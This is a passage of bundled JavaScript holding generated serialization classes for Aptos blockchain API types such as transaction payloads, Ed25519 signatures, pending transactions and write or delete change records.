        this.type = input.type;
        this.modules = input.modules;
    }
    AptosModuleBundlePayloadRequest.create = function(input) {
        if (input instanceof AptosModuleBundlePayloadRequest) return input;
        return new AptosModuleBundlePayloadRequest(input);
    };
    AptosModuleBundlePayloadRequest.fromJSON = function(json) {
        var input = {
            type: json.type,
            modules: json.modules
        };
        return AptosModuleBundlePayloadRequest.create(input);
    };
    AptosModuleBundlePayloadRequest.isInput = function(input) {
        return [
            "type",
            "modules"
        ].every(function(name) {
            return input[name] !== undefined;
        });
    };
    AptosModuleBundlePayloadRequest.isJSON = function(json) {
        return [
            "type",
            "modules"
        ].every(function(name) {
            return json[name] !== undefined;
        });
    };
    AptosModuleBundlePayloadRequest.prototype.toJSON = function() {
        return {
            type: this.type,
            modules: this.modules
        };
    };
    return AptosModuleBundlePayloadRequest;
}();
var $a7ef34a427d74c9c$export$4070391805be9437 = /** @class */ function() {
    function AptosPendingTransactionPayload() {}
    AptosPendingTransactionPayload.create = function(input) {
        if ($a7ef34a427d74c9c$export$32947f115b4ccda8.isInput(input)) return $a7ef34a427d74c9c$export$32947f115b4ccda8.create(input);
        if ($a7ef34a427d74c9c$export$6cc4df55a0d44e53.isInput(input)) return $a7ef34a427d74c9c$export$6cc4df55a0d44e53.create(input);
        if ($a7ef34a427d74c9c$export$f01b89b84789019c.isInput(input)) return $a7ef34a427d74c9c$export$f01b89b84789019c.create(input);
        throw new Error("Cannot resolve union from AptosPendingTransactionPayloadInput");
    };
    AptosPendingTransactionPayload.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$32947f115b4ccda8.isJSON(json)) return $a7ef34a427d74c9c$export$32947f115b4ccda8.fromJSON(json);
        if ($a7ef34a427d74c9c$export$6cc4df55a0d44e53.isJSON(json)) return $a7ef34a427d74c9c$export$6cc4df55a0d44e53.fromJSON(json);
        if ($a7ef34a427d74c9c$export$f01b89b84789019c.isJSON(json)) return $a7ef34a427d74c9c$export$f01b89b84789019c.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosPendingTransactionPayloadJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosPendingTransactionPayload.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$32947f115b4ccda8) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$6cc4df55a0d44e53) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$f01b89b84789019c) return value.toJSON();
        throw new Error("Cannot resolve union from AptosPendingTransactionPayloadValue");
    };
    return AptosPendingTransactionPayload;
}();
// $ref: #/components/schemas/Ed25519SignatureRequest
// type: Ed25519SignatureRequest
// properties:
// - type ($ref: #/components/schemas/Ed25519SignatureRequest/properties/type)
// - signature ($ref: #/components/schemas/Ed25519SignatureRequest/properties/signature)
// - public_key ($ref: #/components/schemas/Ed25519SignatureRequest/properties/public_key)
var $a7ef34a427d74c9c$export$58622fd9455a8cd7 = /** @class */ function() {
    function AptosEd25519SignatureRequest(input) {
        this.type = input.type;
        this.signature = input.signature;
        this.publicKey = input.publicKey;
    }
    AptosEd25519SignatureRequest.create = function(input) {
        if (input instanceof AptosEd25519SignatureRequest) return input;
        return new AptosEd25519SignatureRequest(input);
    };
    AptosEd25519SignatureRequest.fromJSON = function(json) {
        var input = {
            type: json.type,
            signature: json.signature,
            publicKey: json.public_key
        };
        return AptosEd25519SignatureRequest.create(input);
    };
    AptosEd25519SignatureRequest.isInput = function(input) {
        return [
            "type",
            "signature",
            "publicKey"
        ].every(function(name) {
            return input[name] !== undefined;
        });
    };
    AptosEd25519SignatureRequest.isJSON = function(json) {
        return [
            "type",
            "signature",
            "public_key"
        ].every(function(name) {
            return json[name] !== undefined;
        });
    };
    AptosEd25519SignatureRequest.prototype.toJSON = function() {
        return {
            type: this.type,
            signature: this.signature,
            public_key: this.publicKey
        };
    };
    return AptosEd25519SignatureRequest;
}();
// $ref: #/components/schemas/MultiEd25519SignatureRequest
// type: MultiEd25519SignatureRequest
// properties:
// - type ($ref: #/components/schemas/MultiEd25519SignatureRequest/properties/type)
// - public_keys ($ref: #/components/schemas/MultiEd25519SignatureRequest/properties/public_keys)
// - signatures ($ref: #/components/schemas/MultiEd25519SignatureRequest/properties/signatures)
// - threshold ($ref: #/components/schemas/MultiEd25519SignatureRequest/properties/threshold)
// - bitmap ($ref: #/components/schemas/MultiEd25519SignatureRequest/properties/bitmap)
var $a7ef34a427d74c9c$export$55dc148272439b32 = /** @class */ function() {
    function AptosMultiEd25519SignatureRequest(input) {
        this.type = input.type;
        this.publicKeys = input.publicKeys;
        this.signatures = input.signatures;
        this.threshold = input.threshold;
        this.bitmap = input.bitmap;
    }
    AptosMultiEd25519SignatureRequest.create = function(input) {
        if (input instanceof AptosMultiEd25519SignatureRequest) return input;
        return new AptosMultiEd25519SignatureRequest(input);
    };
    AptosMultiEd25519SignatureRequest.fromJSON = function(json) {
        var input = {
            type: json.type,
            publicKeys: json.public_keys,
            signatures: json.signatures,
            threshold: json.threshold,
            bitmap: json.bitmap
        };
        return AptosMultiEd25519SignatureRequest.create(input);
    };
    AptosMultiEd25519SignatureRequest.isInput = function(input) {
        return [
            "type",
            "publicKeys",
            "signatures",
            "threshold",
            "bitmap"
        ].every(function(name) {
            return input[name] !== undefined;
        });
    };
    AptosMultiEd25519SignatureRequest.isJSON = function(json) {
        return [
            "type",
            "public_keys",
            "signatures",
            "threshold",
            "bitmap"
        ].every(function(name) {
            return json[name] !== undefined;
        });
    };
    AptosMultiEd25519SignatureRequest.prototype.toJSON = function() {
        return {
            type: this.type,
            public_keys: this.publicKeys,
            signatures: this.signatures,
            threshold: this.threshold,
            bitmap: this.bitmap
        };
    };
    return AptosMultiEd25519SignatureRequest;
}();
var $a7ef34a427d74c9c$export$8eff9e3c30ee466 = /** @class */ function() {
    function AptosMultiAgentSignatureRequestSecondarySigners() {}
    AptosMultiAgentSignatureRequestSecondarySigners.create = function(input) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isInput(input)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.create(input);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isInput(input)) return $a7ef34a427d74c9c$export$55dc148272439b32.create(input);
        throw new Error("Cannot resolve union from AptosMultiAgentSignatureRequestSecondarySignersInput");
    };
    AptosMultiAgentSignatureRequestSecondarySigners.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isJSON(json)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.fromJSON(json);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isJSON(json)) return $a7ef34a427d74c9c$export$55dc148272439b32.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosMultiAgentSignatureRequestSecondarySignersJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosMultiAgentSignatureRequestSecondarySigners.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$58622fd9455a8cd7) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$55dc148272439b32) return value.toJSON();
        throw new Error("Cannot resolve union from AptosMultiAgentSignatureRequestSecondarySignersValue");
    };
    return AptosMultiAgentSignatureRequestSecondarySigners;
}();
var $a7ef34a427d74c9c$export$a5822950b052cd20 = /** @class */ function() {
    function AptosMultiAgentSignatureRequest(input) {
        this.type = input.type;
        this.sender = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.sender);
        this.secondarySignerAddresses = input.secondarySignerAddresses;
        this.secondarySigners = $a7ef34a427d74c9c$export$8eff9e3c30ee466.create(input.secondarySigners);
    }
    AptosMultiAgentSignatureRequest.create = function(input) {
        if (input instanceof AptosMultiAgentSignatureRequest) return input;
        return new AptosMultiAgentSignatureRequest(input);
    };
    AptosMultiAgentSignatureRequest.fromJSON = function(json) {
        var input = {
            type: json.type,
            sender: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.sender),
            secondarySignerAddresses: json.secondary_signer_addresses,
            secondarySigners: $a7ef34a427d74c9c$export$8eff9e3c30ee466.fromJSON(json.secondary_signers)
        };
        return AptosMultiAgentSignatureRequest.create(input);
    };
    AptosMultiAgentSignatureRequest.isInput = function(input) {
        return [
            "type",
            "sender",
            "secondarySignerAddresses",
            "secondarySigners"
        ].every(function(name) {
            return input[name] !== undefined;
        });
    };
    AptosMultiAgentSignatureRequest.isJSON = function(json) {
        return [
            "type",
            "sender",
            "secondary_signer_addresses",
            "secondary_signers"
        ].every(function(name) {
            return json[name] !== undefined;
        });
    };
    AptosMultiAgentSignatureRequest.prototype.toJSON = function() {
        return {
            type: this.type,
            sender: this.sender.toJSON(),
            secondary_signer_addresses: this.secondarySignerAddresses,
            secondary_signers: $a7ef34a427d74c9c$export$8eff9e3c30ee466.toJSON(this.secondarySigners)
        };
    };
    return AptosMultiAgentSignatureRequest;
}();
var $a7ef34a427d74c9c$export$86cb5d740c06ebab = /** @class */ function() {
    function AptosPendingTransactionSignature() {}
    AptosPendingTransactionSignature.create = function(input) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isInput(input)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.create(input);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isInput(input)) return $a7ef34a427d74c9c$export$55dc148272439b32.create(input);
        if ($a7ef34a427d74c9c$export$a5822950b052cd20.isInput(input)) return $a7ef34a427d74c9c$export$a5822950b052cd20.create(input);
        throw new Error("Cannot resolve union from AptosPendingTransactionSignatureInput");
    };
    AptosPendingTransactionSignature.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isJSON(json)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.fromJSON(json);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isJSON(json)) return $a7ef34a427d74c9c$export$55dc148272439b32.fromJSON(json);
        if ($a7ef34a427d74c9c$export$a5822950b052cd20.isJSON(json)) return $a7ef34a427d74c9c$export$a5822950b052cd20.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosPendingTransactionSignatureJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosPendingTransactionSignature.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$58622fd9455a8cd7) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$55dc148272439b32) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$a5822950b052cd20) return value.toJSON();
        throw new Error("Cannot resolve union from AptosPendingTransactionSignatureValue");
    };
    return AptosPendingTransactionSignature;
}();
var $a7ef34a427d74c9c$export$a68d05dfc4c2e46e = /** @class */ function() {
    function AptosPendingTransaction(input) {
        this.hash = input.hash;
        this.sender = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.sender);
        this.sequenceNumber = input.sequenceNumber;
        this.maxGasAmount = input.maxGasAmount;
        this.gasUnitPrice = input.gasUnitPrice;
        this.expirationTimestampSecs = input.expirationTimestampSecs;
        this.payload = $a7ef34a427d74c9c$export$4070391805be9437.create(input.payload);
        this.signature = $a7ef34a427d74c9c$export$86cb5d740c06ebab.create(input.signature);
    }
    AptosPendingTransaction.create = function(input) {
        if (input instanceof AptosPendingTransaction) return input;
        return new AptosPendingTransaction(input);
    };
    AptosPendingTransaction.fromJSON = function(json) {
        var input = {
            hash: json.hash,
            sender: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.sender),
            sequenceNumber: json.sequence_number,
            maxGasAmount: json.max_gas_amount,
            gasUnitPrice: json.gas_unit_price,
            expirationTimestampSecs: json.expiration_timestamp_secs,
            payload: $a7ef34a427d74c9c$export$4070391805be9437.fromJSON(json.payload),
            signature: $a7ef34a427d74c9c$export$86cb5d740c06ebab.fromJSON(json.signature)
        };
        return AptosPendingTransaction.create(input);
    };
    AptosPendingTransaction.isInput = function(input) {
        return input.type === "pending_transaction";
    };
    AptosPendingTransaction.isJSON = function(json) {
        return json.type === "pending_transaction";
    };
    AptosPendingTransaction.prototype.toJSON = function() {
        return {
            hash: this.hash,
            sender: this.sender.toJSON(),
            sequence_number: this.sequenceNumber,
            max_gas_amount: this.maxGasAmount,
            gas_unit_price: this.gasUnitPrice,
            expiration_timestamp_secs: this.expirationTimestampSecs,
            payload: $a7ef34a427d74c9c$export$4070391805be9437.toJSON(this.payload),
            signature: $a7ef34a427d74c9c$export$86cb5d740c06ebab.toJSON(this.signature)
        };
    };
    return AptosPendingTransaction;
}();
// $ref: #/components/schemas/DeleteModuleChange/properties/module
// typeName: DeleteModuleChange_module
var $a7ef34a427d74c9c$export$57f2d56cab546383 = /** @class */ function() {
    function AptosDeleteModuleChangeModule() {}
    AptosDeleteModuleChangeModule.create = function(input) {
        return input;
    };
    AptosDeleteModuleChangeModule.fromJSON = function(json) {
        return json;
    };
    return AptosDeleteModuleChangeModule;
}();
var $a7ef34a427d74c9c$export$524da76a5356f6df = /** @class */ function() {
    function AptosDeleteModuleChange(input) {
        this.type = input.type;
        this.address = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.address);
        this.stateKeyHash = input.stateKeyHash;
        this.module = $a7ef34a427d74c9c$export$57f2d56cab546383.create(input.module);
    }
    AptosDeleteModuleChange.create = function(input) {
        if (input instanceof AptosDeleteModuleChange) return input;
        return new AptosDeleteModuleChange(input);
    };
    AptosDeleteModuleChange.fromJSON = function(json) {
        var input = {
            type: json.type,
            address: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.address),
            stateKeyHash: json.state_key_hash,
            module: $a7ef34a427d74c9c$export$57f2d56cab546383.fromJSON(json.module)
        };
        return AptosDeleteModuleChange.create(input);
    };
    AptosDeleteModuleChange.isInput = function(input) {
        return input.type === "delete_module";
    };
    AptosDeleteModuleChange.isJSON = function(json) {
        return json.type === "delete_module";
    };
    AptosDeleteModuleChange.prototype.toJSON = function() {
        return {
            type: this.type,
            address: this.address.toJSON(),
            state_key_hash: this.stateKeyHash,
            module: this.module
        };
    };
    return AptosDeleteModuleChange;
}();
// $ref: #/components/schemas/DeleteResourceChange/properties/resource
// typeName: DeleteResourceChange_resource
var $a7ef34a427d74c9c$export$baad54d8d51962b8 = /** @class */ function() {
    function AptosDeleteResourceChangeResource() {}
    AptosDeleteResourceChangeResource.create = function(input) {
        return input;
    };
    AptosDeleteResourceChangeResource.fromJSON = function(json) {
        return json;
    };
    return AptosDeleteResourceChangeResource;
}();
var $a7ef34a427d74c9c$export$979d9c14f991e192 = /** @class */ function() {
    function AptosDeleteResourceChange(input) {
        this.type = input.type;
        this.address = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.address);
        this.stateKeyHash = input.stateKeyHash;
        this.resource = $a7ef34a427d74c9c$export$baad54d8d51962b8.create(input.resource);
    }
    AptosDeleteResourceChange.create = function(input) {
        if (input instanceof AptosDeleteResourceChange) return input;
        return new AptosDeleteResourceChange(input);
    };
    AptosDeleteResourceChange.fromJSON = function(json) {
        var input = {
            type: json.type,
            address: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.address),
            stateKeyHash: json.state_key_hash,
            resource: $a7ef34a427d74c9c$export$baad54d8d51962b8.fromJSON(json.resource)
        };
        return AptosDeleteResourceChange.create(input);
    };
    AptosDeleteResourceChange.isInput = function(input) {
        return input.type === "delete_resource";
    };
    AptosDeleteResourceChange.isJSON = function(json) {
        return json.type === "delete_resource";
    };
    AptosDeleteResourceChange.prototype.toJSON = function() {
        return {
            type: this.type,
            address: this.address.toJSON(),
            state_key_hash: this.stateKeyHash,
            resource: this.resource
        };
    };
    return AptosDeleteResourceChange;
}();
// $ref: #/components/schemas/DeleteTableItemChange/properties/handle
// typeName: DeleteTableItemChange_handle
var $a7ef34a427d74c9c$export$28b5db8fbc31020f = /** @class */ function() {
    function AptosDeleteTableItemChangeHandle() {}
    AptosDeleteTableItemChangeHandle.create = function(input) {
        return input;
    };
    AptosDeleteTableItemChangeHandle.fromJSON = function(json) {
        return json;
    };
    return AptosDeleteTableItemChangeHandle;
}();
// $ref: #/components/schemas/DeleteTableItemChange/properties/key
// typeName: DeleteTableItemChange_key
var $a7ef34a427d74c9c$export$26e788773011ba74 = /** @class */ function() {
    function AptosDeleteTableItemChangeKey() {}
    AptosDeleteTableItemChangeKey.create = function(input) {
        return input;
    };
    AptosDeleteTableItemChangeKey.fromJSON = function(json) {
        return json;
    };
    return AptosDeleteTableItemChangeKey;
}();
// $ref: #/components/schemas/DeletedTableData
// type: DeletedTableData
// properties:
// - key ($ref: #/components/schemas/DeletedTableData/properties/key)
// - key_type ($ref: #/components/schemas/DeletedTableData/properties/key_type)
var $a7ef34a427d74c9c$export$6bbaac88ec09a28 = /** @class */ function() {
    function AptosDeletedTableData(input) {
        this.key = input.key;
        this.keyType = input.keyType;
    }
    AptosDeletedTableData.create = function(input) {
        if (input instanceof AptosDeletedTableData) return input;
        return new AptosDeletedTableData(input);
    };
    AptosDeletedTableData.fromJSON = function(json) {
        var input = {
            key: json.key,
            keyType: json.key_type
        };
        return AptosDeletedTableData.create(input);
    };
    AptosDeletedTableData.prototype.toJSON = function() {
        return {
            key: this.key,
            key_type: this.keyType
        };
    };
    return AptosDeletedTableData;
}();
var $a7ef34a427d74c9c$export$987a952a34863a4e = /** @class */ function() {
    function AptosDeleteTableItemChange(input) {
        this.type = input.type;
        this.stateKeyHash = input.stateKeyHash;
        this.handle = $a7ef34a427d74c9c$export$28b5db8fbc31020f.create(input.handle);
        this.key = $a7ef34a427d74c9c$export$26e788773011ba74.create(input.key);
        this.data = $a7ef34a427d74c9c$export$6bbaac88ec09a28.create(input.data);
    }
    AptosDeleteTableItemChange.create = function(input) {
        if (input instanceof AptosDeleteTableItemChange) return input;
        return new AptosDeleteTableItemChange(input);
    };
    AptosDeleteTableItemChange.fromJSON = function(json) {
        var input = {
            type: json.type,
            stateKeyHash: json.state_key_hash,
            handle: $a7ef34a427d74c9c$export$28b5db8fbc31020f.fromJSON(json.handle),
            key: $a7ef34a427d74c9c$export$26e788773011ba74.fromJSON(json.key),
            data: $a7ef34a427d74c9c$export$6bbaac88ec09a28.fromJSON(json.data)
        };
        return AptosDeleteTableItemChange.create(input);
    };
    AptosDeleteTableItemChange.isInput = function(input) {
        return input.type === "delete_table_item";
    };
    AptosDeleteTableItemChange.isJSON = function(json) {
        return json.type === "delete_table_item";
    };
    AptosDeleteTableItemChange.prototype.toJSON = function() {
        return {
            type: this.type,
            state_key_hash: this.stateKeyHash,
            handle: this.handle,
            key: this.key,
            data: this.data.toJSON()
        };
    };
    return AptosDeleteTableItemChange;
}();
var $a7ef34a427d74c9c$export$f7b0db2a6d8afda = /** @class */ function() {
    function AptosWriteModuleData(input) {
        this.bytecode = input.bytecode;
        this.abi = $a7ef34a427d74c9c$export$cd39ab3ff7ff52cf.create(input.abi);
    }
    AptosWriteModuleData.create = function(input) {
        if (input instanceof AptosWriteModuleData) return input;
        return new AptosWriteModuleData(input);
    };
    AptosWriteModuleData.fromJSON = function(json) {
        var input = {
            bytecode: json.bytecode,
            abi: $a7ef34a427d74c9c$export$cd39ab3ff7ff52cf.fromJSON(json.abi)
        };
        return AptosWriteModuleData.create(input);
    };
    AptosWriteModuleData.prototype.toJSON = function() {
        return {
            bytecode: this.bytecode,
            abi: this.abi.toJSON()
        };
    };
    return AptosWriteModuleData;
}();
var $a7ef34a427d74c9c$export$a7cb78b41f26e6a1 = /** @class */ function() {
    function AptosWriteOrUpdateModuleChange(input) {
        this.type = input.type;
        this.address = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.address);
        this.stateKeyHash = input.stateKeyHash;
        this.data = $a7ef34a427d74c9c$export$f7b0db2a6d8afda.create(input.data);
    }
    AptosWriteOrUpdateModuleChange.create = function(input) {
        if (input instanceof AptosWriteOrUpdateModuleChange) return input;
        return new AptosWriteOrUpdateModuleChange(input);
    };
    AptosWriteOrUpdateModuleChange.fromJSON = function(json) {
        var input = {
            type: json.type,
            address: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.address),
            stateKeyHash: json.state_key_hash,
            data: $a7ef34a427d74c9c$export$f7b0db2a6d8afda.fromJSON(json.data)
        };
        return AptosWriteOrUpdateModuleChange.create(input);
    };
    AptosWriteOrUpdateModuleChange.isInput = function(input) {
        return input.type === "write_module";
    };
    AptosWriteOrUpdateModuleChange.isJSON = function(json) {
        return json.type === "write_module";
    };
    AptosWriteOrUpdateModuleChange.prototype.toJSON = function() {
        return {
            type: this.type,
            address: this.address.toJSON(),
            state_key_hash: this.stateKeyHash,
            data: this.data.toJSON()
        };
    };
    return AptosWriteOrUpdateModuleChange;
}();
// $ref: #/components/schemas/WriteResourceData/properties/data
// typeName: WriteResourceData_data
var $a7ef34a427d74c9c$export$83aaf26335f834ae = /** @class */ function() {
    function AptosWriteResourceDataData() {}
    AptosWriteResourceDataData.create = function(input) {
        return input;
    };
    AptosWriteResourceDataData.fromJSON = function(json) {
        return json;
    };
    return AptosWriteResourceDataData;
}();
var $a7ef34a427d74c9c$export$981b3ab59d3c9c50 = /** @class */ function() {
    function AptosWriteResourceData(input) {
        this.type = input.type;
        this.data = $a7ef34a427d74c9c$export$83aaf26335f834ae.create(input.data);
    }
    AptosWriteResourceData.create = function(input) {
        if (input instanceof AptosWriteResourceData) return input;
        return new AptosWriteResourceData(input);
    };
    AptosWriteResourceData.fromJSON = function(json) {
        var input = {
            type: json.type,
            data: $a7ef34a427d74c9c$export$83aaf26335f834ae.fromJSON(json.data)
        };
        return AptosWriteResourceData.create(input);
    };
    AptosWriteResourceData.prototype.toJSON = function() {
        return {
            type: this.type,
            data: this.data
        };
    };
    return AptosWriteResourceData;
}();
var $a7ef34a427d74c9c$export$34b2c39595f761ce = /** @class */ function() {
    function AptosWriteResourceChange(input) {
        this.type = input.type;
        this.address = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.address);
        this.stateKeyHash = input.stateKeyHash;
        this.data = $a7ef34a427d74c9c$export$981b3ab59d3c9c50.create(input.data);
    }
    AptosWriteResourceChange.create = function(input) {
        if (input instanceof AptosWriteResourceChange) return input;
        return new AptosWriteResourceChange(input);
    };
    AptosWriteResourceChange.fromJSON = function(json) {
        var input = {
            type: json.type,
            address: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.address),
            stateKeyHash: json.state_key_hash,
            data: $a7ef34a427d74c9c$export$981b3ab59d3c9c50.fromJSON(json.data)
        };
        return AptosWriteResourceChange.create(input);
    };
    AptosWriteResourceChange.isInput = function(input) {
        return input.type === "write_resource";
    };
    AptosWriteResourceChange.isJSON = function(json) {
        return json.type === "write_resource";
    };
    AptosWriteResourceChange.prototype.toJSON = function() {
        return {
            type: this.type,
            address: this.address.toJSON(),
            state_key_hash: this.stateKeyHash,
            data: this.data.toJSON()
        };
    };
    return AptosWriteResourceChange;
}();
// $ref: #/components/schemas/DecodedTableData
// type: DecodedTableData
// properties:
// - key ($ref: #/components/schemas/DecodedTableData/properties/key)
// - key_type ($ref: #/components/schemas/DecodedTableData/properties/key_type)
// - value ($ref: #/components/schemas/DecodedTableData/properties/value)
// - value_type ($ref: #/components/schemas/DecodedTableData/properties/value_type)
var $a7ef34a427d74c9c$export$978e3a86e40457ee = /** @class */ function() {
    function AptosDecodedTableData(input) {
        this.key = input.key;
        this.keyType = input.keyType;
        this.value = input.value;
        this.valueType = input.valueType;
    }
    AptosDecodedTableData.create = function(input) {
        if (input instanceof AptosDecodedTableData) return input;
        return new AptosDecodedTableData(input);
    };
    AptosDecodedTableData.fromJSON = function(json) {
        var input = {
            key: json.key,
            keyType: json.key_type,
            value: json.value,
            valueType: json.value_type
        };
        return AptosDecodedTableData.create(input);
    };
    AptosDecodedTableData.prototype.toJSON = function() {
        return {
            key: this.key,
            key_type: this.keyType,
            value: this.value,
            value_type: this.valueType
        };
    };
    return AptosDecodedTableData;
}();
var $a7ef34a427d74c9c$export$88a63a7f3746e5f8 = /** @class */ function() {
    function AptosWriteTableChangeSetChange(input) {
        this.type = input.type;
        this.stateKeyHash = input.stateKeyHash;
        this.handle = input.handle;
        this.key = input.key;
        this.value = input.value;
        this.data = $a7ef34a427d74c9c$export$978e3a86e40457ee.create(input.data);
    }
    AptosWriteTableChangeSetChange.create = function(input) {
        if (input instanceof AptosWriteTableChangeSetChange) return input;
        return new AptosWriteTableChangeSetChange(input);
    };
    AptosWriteTableChangeSetChange.fromJSON = function(json) {
        var input = {
            type: json.type,
            stateKeyHash: json.state_key_hash,
            handle: json.handle,
            key: json.key,
            value: json.value,
            data: $a7ef34a427d74c9c$export$978e3a86e40457ee.fromJSON(json.data)
        };
        return AptosWriteTableChangeSetChange.create(input);
    };
    AptosWriteTableChangeSetChange.isInput = function(input) {
        return input.type === "write_table_item";
    };
    AptosWriteTableChangeSetChange.isJSON = function(json) {
        return json.type === "write_table_item";
    };
    AptosWriteTableChangeSetChange.prototype.toJSON = function() {
        return {
            type: this.type,
            state_key_hash: this.stateKeyHash,
            handle: this.handle,
            key: this.key,
            value: this.value,
            data: this.data.toJSON()
        };
    };
    return AptosWriteTableChangeSetChange;
}();
var $a7ef34a427d74c9c$export$7f1d21131ce1b153 = /** @class */ function() {
    function AptosUserTransactionChangesItem() {}
    AptosUserTransactionChangesItem.create = function(input) {
        if ($a7ef34a427d74c9c$export$524da76a5356f6df.isInput(input)) return $a7ef34a427d74c9c$export$524da76a5356f6df.create(input);
        if ($a7ef34a427d74c9c$export$979d9c14f991e192.isInput(input)) return $a7ef34a427d74c9c$export$979d9c14f991e192.create(input);
        if ($a7ef34a427d74c9c$export$987a952a34863a4e.isInput(input)) return $a7ef34a427d74c9c$export$987a952a34863a4e.create(input);
        if ($a7ef34a427d74c9c$export$a7cb78b41f26e6a1.isInput(input)) return $a7ef34a427d74c9c$export$a7cb78b41f26e6a1.create(input);
        if ($a7ef34a427d74c9c$export$34b2c39595f761ce.isInput(input)) return $a7ef34a427d74c9c$export$34b2c39595f761ce.create(input);
        if ($a7ef34a427d74c9c$export$88a63a7f3746e5f8.isInput(input)) return $a7ef34a427d74c9c$export$88a63a7f3746e5f8.create(input);
        throw new Error("Cannot resolve union from AptosUserTransactionChangesItemInput");
    };
    AptosUserTransactionChangesItem.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$524da76a5356f6df.isJSON(json)) return $a7ef34a427d74c9c$export$524da76a5356f6df.fromJSON(json);
        if ($a7ef34a427d74c9c$export$979d9c14f991e192.isJSON(json)) return $a7ef34a427d74c9c$export$979d9c14f991e192.fromJSON(json);
        if ($a7ef34a427d74c9c$export$987a952a34863a4e.isJSON(json)) return $a7ef34a427d74c9c$export$987a952a34863a4e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$a7cb78b41f26e6a1.isJSON(json)) return $a7ef34a427d74c9c$export$a7cb78b41f26e6a1.fromJSON(json);
        if ($a7ef34a427d74c9c$export$34b2c39595f761ce.isJSON(json)) return $a7ef34a427d74c9c$export$34b2c39595f761ce.fromJSON(json);
        if ($a7ef34a427d74c9c$export$88a63a7f3746e5f8.isJSON(json)) return $a7ef34a427d74c9c$export$88a63a7f3746e5f8.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosUserTransactionChangesItemJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosUserTransactionChangesItem.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$524da76a5356f6df) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$979d9c14f991e192) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$987a952a34863a4e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$a7cb78b41f26e6a1) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$34b2c39595f761ce) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$88a63a7f3746e5f8) return value.toJSON();
        throw new Error("Cannot resolve union from AptosUserTransactionChangesItemValue");
    };
    return AptosUserTransactionChangesItem;
}();
var $a7ef34a427d74c9c$export$4497006109c4cab0 = /** @class */ function() {
    function AptosUserTransactionPayload() {}
    AptosUserTransactionPayload.create = function(input) {
        if ($a7ef34a427d74c9c$export$32947f115b4ccda8.isInput(input)) return $a7ef34a427d74c9c$export$32947f115b4ccda8.create(input);
        if ($a7ef34a427d74c9c$export$6cc4df55a0d44e53.isInput(input)) return $a7ef34a427d74c9c$export$6cc4df55a0d44e53.create(input);
        if ($a7ef34a427d74c9c$export$f01b89b84789019c.isInput(input)) return $a7ef34a427d74c9c$export$f01b89b84789019c.create(input);
        throw new Error("Cannot resolve union from AptosUserTransactionPayloadInput");
    };
    AptosUserTransactionPayload.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$32947f115b4ccda8.isJSON(json)) return $a7ef34a427d74c9c$export$32947f115b4ccda8.fromJSON(json);
        if ($a7ef34a427d74c9c$export$6cc4df55a0d44e53.isJSON(json)) return $a7ef34a427d74c9c$export$6cc4df55a0d44e53.fromJSON(json);
        if ($a7ef34a427d74c9c$export$f01b89b84789019c.isJSON(json)) return $a7ef34a427d74c9c$export$f01b89b84789019c.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosUserTransactionPayloadJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosUserTransactionPayload.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$32947f115b4ccda8) return value.toJSON();
